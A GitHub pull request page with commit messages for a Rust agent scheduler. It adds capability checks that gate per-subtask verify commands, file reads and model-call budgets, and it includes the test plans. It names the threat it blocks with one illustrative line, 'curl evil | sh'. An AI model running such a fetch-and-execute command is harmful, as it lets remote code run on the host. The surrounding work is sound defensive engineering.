feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) #765
Closed
hartsock wants to merge 1 commit into
…is (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760).

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
This was referenced Jun 29, 2026
hartsock added a commit that referenced this pull request Jun 29, 2026
…lls, team-verify, clamp grammar (#749) (#781)

* feat(ocap): crew.rs enforces fs_read — complete mediation for reads (#752)

  OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751).

  The crew CURATE stage read navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read caveat: ..."), so a clamped read fails visibly.

  TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is not read, the in-scope one is (red on today's code — both read; green after). just check green (52 newt-scheduler tests, +1).

  Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read scope is a separate algebra refinement (follow-up). This PR wires the existing predicate.

  Fixes #752. Part of #749. Refs #739, #741.

  Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): crew enforces max_calls — complete mediation for the call budget (#753)

  OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759).

  The crew loop bounded work only by cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success). The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default) leaves unclamped crews unchanged.

  net: documented in-code — the crew loop has no direct net effect a permits_net check could gate; net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate (per-axis complete mediation: this axis needs a sandbox, not a call-site).

  TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green — 0). RED verified by neutralizing the gates. just check green.

  Fixes #753. Part of #749. Refs #739, #741.

  Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)

  OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760).

  The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

  TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests).

  Fixes #754. Part of #749. Refs #739, #741.

  Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): NamedPermissionPreset can clamp fs_read — clamp-grammar fix (#755)

  OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765).

  The M6 grammar gap: a preset could not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec> (serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified.

  Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp — follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity; default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default — flipping it would break back-compat for every preset consumer).

  TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat (omitted fs_read => All) + config-parse. RED verified by revert. just check green.

  Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test fixtures); behavior-preserving (consumer literals use ..default()).

  Fixes #755. Part of #749. Refs #739, #741.

  Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com>
Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
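The max_calls commit (#753) describes a call budget consulted before every model dispatch. A minimal sketch of that shape follows, not the code in the crew loop itself. The names `CountBound`, `Unlimited`, `AtMost`, `permits_one_more`, `calls_used` and `NeedsHumanReview` come from the commit message; the `used < limit` comparison, the `Outcome` enum, the `run_crew` signature, and the one-dispatch-per-attempt loop are assumptions made for illustration.

```rust
/// Call budget; variant names taken from the commit message.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum CountBound {
    Unlimited,
    AtMost(u32),
}

impl CountBound {
    /// Assumed semantics: one more call is allowed while `used` is below the cap.
    fn permits_one_more(self, used: u32) -> bool {
        match self {
            CountBound::Unlimited => true,
            CountBound::AtMost(limit) => used < limit,
        }
    }
}

/// Hypothetical outcome type; only `NeedsHumanReview` is named in the source.
#[derive(Debug, PartialEq, Eq)]
enum Outcome {
    Done,
    NeedsHumanReview,
}

/// Hypothetical crew loop with one dispatch per attempt.
/// `dispatch` returns true when the work is finished.
/// `max_calls` is checked before every dispatch, independently of `max_attempts`.
fn run_crew(
    max_calls: CountBound,
    max_attempts: u32,
    mut dispatch: impl FnMut() -> bool,
) -> (Outcome, u32) {
    let mut calls_used = 0u32;
    for _ in 0..max_attempts {
        if !max_calls.permits_one_more(calls_used) {
            // Budget exhausted: stop with a cap-exit, never a success.
            return (Outcome::NeedsHumanReview, calls_used);
        }
        calls_used += 1;
        if dispatch() {
            return (Outcome::Done, calls_used);
        }
    }
    (Outcome::NeedsHumanReview, calls_used)
}
```

Under these assumptions, `run_crew(CountBound::AtMost(3), 10, || false)` stops after three dispatches, and `AtMost(0)` stops before the first one, which mirrors the two TDD cases named in the commit.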
OCAP enforcement-floor stack — PR 5 of 8 · epic #749

Stacked on step 4 (#760). Review/merge after #760. This completes the core complete-mediation (steps 2–5): the `.meet()` seam + enforcement on fs_read, max_calls, and now the team-mode verify. Full order: #749.

What this does

The lead-authored per-subtask `verify` (team.rs run_team) was installed as the test command with no exec check — a malicious `verify` (curl evil | sh) ran ungated (T2 verify-as-payload, design review §3.3). Now `caveats.permits_exec(verify)` gates it before `set_test_command`: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it).

Test plan

`denied_per_subtask_verify_is_refused_not_installed` — exec=Only([check-a]); verify `check-b` is NOT installed, `check-a` is (red on today's code — both installed; green after). RED verified by revert.
`just check` green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.
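The refused-not-run gate can be sketched roughly as below. This is an illustration under assumptions, not the code in team.rs: `permits_exec` and `set_test_command` are named in the description, while the `ExecScope` enum, the `Workspace` struct, the `install_verify` helper, the note wording, and the exact-string membership check are hypothetical stand-ins.

```rust
use std::collections::BTreeSet;

/// Hypothetical exec axis: everything, or an explicit allow-list.
#[derive(Debug, Clone)]
enum ExecScope {
    All,
    Only(BTreeSet<String>),
}

/// Hypothetical, reduced caveat set carrying only the exec axis.
#[derive(Debug, Clone)]
struct Caveats {
    exec: ExecScope,
}

impl Caveats {
    /// Assumed to be exact-string membership for this sketch.
    fn permits_exec(&self, command: &str) -> bool {
        match &self.exec {
            ExecScope::All => true,
            ExecScope::Only(allowed) => allowed.contains(command),
        }
    }
}

/// Hypothetical workspace that holds the currently installed test command.
#[derive(Debug)]
struct Workspace {
    test_command: String,
}

impl Workspace {
    fn new(default_check: &str) -> Self {
        Workspace { test_command: default_check.to_string() }
    }

    fn set_test_command(&mut self, command: &str) {
        self.test_command = command.to_string();
    }
}

/// Gate the lead-authored verify before installing it.
/// Returns a note when the verify is refused; the workspace is left untouched in that case.
fn install_verify(ws: &mut Workspace, caveats: &Caveats, verify: &str) -> Option<String> {
    if caveats.permits_exec(verify) {
        ws.set_test_command(verify);
        None
    } else {
        Some(format!(
            "verify `{verify}` refused under your exec caveat; workspace default check stands"
        ))
    }
}
```

With exec=Only([check-a]), calling `install_verify` with `check-b` returns a note and leaves the default check in place, while `check-a` is installed. The check sits before the only call to `set_test_command`, so a denied command is never stored where a later step could run it.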
🤖 Generated with Claude Code